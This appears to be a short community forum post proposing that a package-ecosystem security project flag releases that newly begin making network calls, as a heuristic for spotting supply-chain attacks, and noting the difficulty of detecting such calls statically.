This is more of a thought I entertained a few days ago than a formal proposal. Some supply-chain attacks had a common pattern - a package started uploading data all of a sudden. I think that if we could track that a package that didn’t make network calls started doing them in a new release, we could use this information for security purposes.
While I don’t think that there’s a foolproof way to statically detect network/HTTP calls, I think that such metric would be useful to “flag” a package for further inspection. The problem is that HTTP calls come in all shapes and sizes. From raw OS calls all the way up to using a high level library like requests. Making an efficient heuristic for this may be challenging.
This behavioral analysis may be expanded beyond network.
If anyone has any thoughts about that, I’d be glad to discuss the matter further. I think that this project is of utmost importance to our community and I am looking forward to contributing to it